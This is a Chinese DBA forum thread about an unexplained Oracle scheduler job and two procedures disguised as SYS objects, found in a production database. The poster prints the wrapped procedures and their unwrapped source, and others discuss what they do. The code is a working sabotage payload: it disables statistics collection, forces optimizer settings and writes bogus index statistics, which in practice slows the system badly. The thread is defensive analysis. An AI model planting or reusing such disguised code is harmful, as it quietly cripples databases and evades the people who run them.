核心数据库被人植入代码，不知道怎么破解。。。。

foodfoodfoodfoo · 发表于 2015-12-11 08:27

在DBMS_SCHEDULER.JOB中找到个没人承认建立的JOB
BEGIN
  SYS.DBMS_SCHEDULER.CREATE_JOB
(
   job_name       => 'SYS.VALID_COLL_JOB'
   ,start_date    => TO_TIMESTAMP_TZ('2014/06/01 00:00:00.000000 +08:00','yyyy/mm/dd hh24:mi:ss.ff tzr')
   ,repeat_interval => 'Freq=Daily;ByHour=0;ByMinute=0;BySecond=0'
   ,end_date       => NULL
   ,job_class    => 'DEFAULT_JOB_CLASS'
   ,job_type       => 'PLSQL_BLOCK'
   ,job_action    => 'sys.dbms_valid_advisor;'
   ,comments       => 'Oracle Valid Collectation Data Job'
);
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'RESTARTABLE'
   ,value    => FALSE);
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'LOGGING_LEVEL'
   ,value    => SYS.DBMS_SCHEDULER.LOGGING_OFF);
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE_NULL
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'MAX_FAILURES');
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE_NULL
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'MAX_RUNS');
  BEGIN
SYS.DBMS_SCHEDULER.SET_ATTRIBUTE
   ( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'STOP_ON_WINDOW_CLOSE'
   ,value    => FALSE);
  EXCEPTION
-- could fail if program is of type EXECUTABLE...
WHEN OTHERS THEN
   NULL;
  END;
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'JOB_PRIORITY'
   ,value    => 3);
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE_NULL
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'SCHEDULE_LIMIT');
  SYS.DBMS_SCHEDULER.SET_ATTRIBUTE
( name    => 'SYS.VALID_COLL_JOB'
   ,attribute => 'AUTO_DROP'
   ,value    => FALSE);
END;
/

两个伪装成系统存储过程，加密的。
CREATE OR REPLACE procedure SYS.DBMS_VALID_ADVISOR wrapped
a000000
354
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
7
6e0 44b
cfmLhrIWjwnw+IsECprKEpiIyuUwg41cuiCDfI4ZHs6UPxGUdVRceyaWPrfm4BjEFGBhHdL6
UchrES/F8UoyBsa7dtr7nh7ogWspvj8imr71FlOu1qJp09JmJoCHheHNRO8bvspZ3+c4756q
lRgZXu5Risb8jXZKFQuTm1J08++uzh2uaCEkTMRf7ES3tG19WK8fz1nUZkVN3SYvcXGsCQB0
JlJaNiIbrJY041qrCQ/3KBqWMPVv4/sE450hohE1+AQCLBNN8t50gNxIjIC7k1+WDaZHwfQ7
iQXsrqWFMGc3YVC38tVvs9o6yh2uWEkDIt7sddol3vMqDn+oDhnBK3HGoXeMUT63QcNRvXYM
1IafsBDrJ1x1hZivdkxLVMWWMy65xdpUmJD2E2gRvWu2/EkY02/pIXCljgZ66G1WxDuN+aar
pAlSlHwpgeaD9W4SKBUCQF3y/JY0wVdinBo6aDJW07JD+9hOLHCH4WzFrj8CkxhUNAduYgMh
ljIiTGMa+FhX/9K+cbeBXlg7wg8pQI5DoFaFfu1x6ANlusFK6zn2RVhRqfNS00B5wtebOiOY
rtaXtwfG+1Bd30qhB+JsoAZvF2EGn329BAxEkQVABsifkHO30uREcMJY0egKsAGnlm6MG3Ds
2sAMekbWP7+1McgpwttlDxhlTPdmYvoFZ1UFnvy79CUlG6NjCoGL6Zzr12ZimHj+quCsKDjT
UvfYYl3PVKjSJptbPUqohFONW/XoyHb9I4jHPQc95+VuXDwjY5JL5ZTuiy+gk3ZQ9N8KIAQo
I0Hfe8XV1JRKQN8ZTNvtwh82oQ0b69MLrYWBhkonTQq0ZABv4HLMmCIkuRn+aVxDqsO0r8Hw
qE8k4p55QIGeU7F8Simu1XixBWhHY5AgF8QKlgZIW+D9ca7XgQGgyzpOJwMZb9RrxxDONWqb
UjrtVwRpKnIYm4XEAHMtZ2S2PeSiKrpvQ8STQjmbI22K0spqDYoHcQnCJFjwxywezHJUABC7
szbAZdu2Qs/pbDuuebE/Ip9HAovM24kFDrZPy5RuYFBYyVI0VJtLAVP4jzlXwbXdaNSYmv4e
6xo=
/

CREATE OR REPLACE procedure SYS.DBMS_USER_LOGON wrapped
a000000
354
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
7
16d 16d
J3mOF2K1iFOcMYZgWFTDVck4NfUwg5DI2q5qZy9GJnPVYWd7EVYOZ+bcnsFIhm710H0cFMNJ
HVvCkdr3eZ7OgW634T5sPfKCA0/Jv/Yh6Yuy4bqh/TTptkbioJdT16ZXXMtTwFRrPsKUK3Fs
PVFn7PXlczE8wY+DEb0zlYva72Rqxz5X1lU5tnGJPETGbNHx1/IHlXQPatfeIPv+xI/fVwP7
uNB32jbRbGVBwmf8nxgdX1J2E4RPizYHhnf11652FYDYsGSoSqgzgfb9nEZ6Qyg6pKgazii5
c5hkmItiXzK/fhP5xzowBg7gJiD37kEGPFIA6i6wPlAmxC2qzY0fZpUJ5AZr6Z+Bmc7KF0A=
/

谁知道怎么破解，程序什么功能？？

foodfoodfoodfoo · 发表于 2015-12-11 08:34

网上下了个fyunwrap破解
PROCEDURE DBMS_VALID_ADVISOR IS
  IVER INTEGER;
  ICNT INTEGER;
  ILVL INTEGER;
  SOWNER VARCHAR2(30);
  SIDXNAME VARCHAR2(30);
  CROW WRM$_VALID_ERROR%ROWTYPE;
  CURSOR MCUR IS SELECT * FROM WRM$_VALID_ERROR;
  TYPE TYP_CUR_REF IS REF CURSOR;
  CUR_REF TYP_CUR_REF;
BEGIN
  SELECT ICOUNT INTO ICNT FROM WRM$_VALID WHERE LAST_TIME<SYSDATE;
  IF (ICNT < 1) THEN
SELECT TO_NUMBER(SUBSTR(VERSION,1,2)) INTO IVER FROM V$INSTANCE;
IF (IVER=10) THEN
   EXECUTE IMMEDIATE 'begin DBMS_SCHEDULER.DISABLE(''GATHER_STATS_JOB''); end;';
ELSIF (IVER=11) THEN
   EXECUTE IMMEDIATE 'begin DBMS_AUTO_TASK_ADMIN.DISABLE(client_name => ''auto optimizer stats collection'', operation => NULL, window_name => NULL); end;';
END IF;

SELECT VALUE INTO ILVL FROM V$PARAMETER WHERE NAME='optimizer_dynamic_sampling';
IF (ILVL < 6 AND ICNT=0) THEN
   EXECUTE IMMEDIATE 'alter system set optimizer_dynamic_sampling=6';
   EXECUTE IMMEDIATE 'alter sysetm set memory_target=2G';
END IF;

OPEN MCUR;
LOOP
   FETCH MCUR INTO CROW;
   EXIT WHEN MCUR%NOTFOUND;

   OPEN CUR_REF FOR SELECT OWNER,INDEX_NAME FROM DBA_INDEXES WHERE TABLE_OWNER=CROW.OWNER AND TABLE_NAME=CROW.TABLE_NAME;
   LOOP
      FETCH CUR_REF INTO SOWNER,SIDXNAME;
      EXIT WHEN CUR_REF%NOTFOUND;
      EXECUTE IMMEDIATE 'begin dbms_stats.set_index_stats(ownname  => '''|| SOWNER ||''',indname  => '''|| SIDXNAME ||''',numrows  => 100000000000,numlblks => 100000,numdist  => 100000,avglblk  => 100000,avgdblk  => 100000,clstfct  => 100000000000); end;';
   END LOOP;
   CLOSE CUR_REF;

END LOOP;
CLOSE MCUR;
  END IF;

  UPDATE WRM$_VALID SET ICOUNT=ICOUNT-1;
  COMMIT;
EXCEPTION
  WHEN OTHERS THEN
NULL;
END DBMS_VALID_ADVISOR;

foodfoodfoodfoo · 发表于 2015-12-11 08:36

PROCEDURE DBMS_USER_LOGON
IS
  ICNT INTEGER;
BEGIN
  SELECT ICOUNT INTO ICNT FROM SYS.WRM$_VALID WHERE LAST_TIME<SYSDATE;
  IF (ICNT < 1) THEN
EXECUTE IMMEDIATE 'alter session set optimizer_features_enable=''9.2.0''';
EXECUTE IMMEDIATE 'alter session set optimizer_dynamic_sampling=6';
  END IF;
EXCEPTION
  WHEN OTHERS THEN
NULL;
END DBMS_USER_LOGON;

lfree · 发表于 2015-12-11 08:45

估计是那个前任建的，不想人家知道他的秘密把了。

foodfoodfoodfoo · 发表于 2015-12-11 09:01

本帖最后由 foodfoodfoodfood 于 2015-12-11 09:03 编辑

lfree 发表于 2015-12-11 08:45
估计是那个前任建的，不想人家知道他的秘密把了。

但是他为啥强制把索引失效,仔细分析功能就是停止统计信息收集，同时使索引失效，系统不就死了么

lfree · 发表于 2015-12-11 09:06

EXECUTE IMMEDIATE 'begin dbms_stats.set_index_stats(ownname => '''|| SOWNER ||''',indname => '''|| SIDXNAME ||''',numrows => 100000000000,numlblks => 100000,numdist => 100000,avglblk => 100000,avgdblk => 100000,clstfct => 100000000000); end;';

--你看仔细了。这样设置是更加趋向使用索引。

ZALBB · 发表于 2015-12-11 09:29

OPEN MCUR;
LOOP
   FETCH MCUR INTO CROW;
   EXIT WHEN MCUR%NOTFOUND;

   OPEN CUR_REF FOR SELECT OWNER,INDEX_NAME FROM DBA_INDEXES WHERE TABLE_OWNER=CROW.OWNER AND TABLE_NAME=CROW.TABLE_NAME;
   LOOP
      FETCH CUR_REF INTO SOWNER,SIDXNAME;
      EXIT WHEN CUR_REF%NOTFOUND;
      EXECUTE IMMEDIATE 'begin dbms_stats.set_index_stats(ownname  => '''|| SOWNER ||''',indname  => '''|| SIDXNAME ||''',numrows  => 100000000000,numlblks => 100000,numdist  => 100000,avglblk  => 100000,avgdblk  => 100000,clstfct  => 100000000000); end;';
   END LOOP;
   CLOSE CUR_REF;

对所有的索引都这样设置, 想干嘛?

ZALBB · 发表于 2015-12-11 09:31

lfree 发表于 2015-12-11 09:06
EXECUTE IMMEDIATE 'begin dbms_stats.set_index_stats(ownname => '''|| SOWNER ||''',indname => '''| ...

clstfct => 10000000000

忘记这个参数的计算方法了, 这值这么大, 趋向使用索引?

lcpp8 · 发表于 2015-12-11 09:40

好腻害。

foodfoodfoodfoo · 发表于 2015-12-11 09:47

lfree 发表于 2015-12-11 09:06
EXECUTE IMMEDIATE 'begin dbms_stats.set_index_stats(ownname => '''|| SOWNER ||''',indname => '''| ...

额，那我们这实际效果是执行完后表走全表扫描，系统特别卡。
怎么看出更加趋向使用索引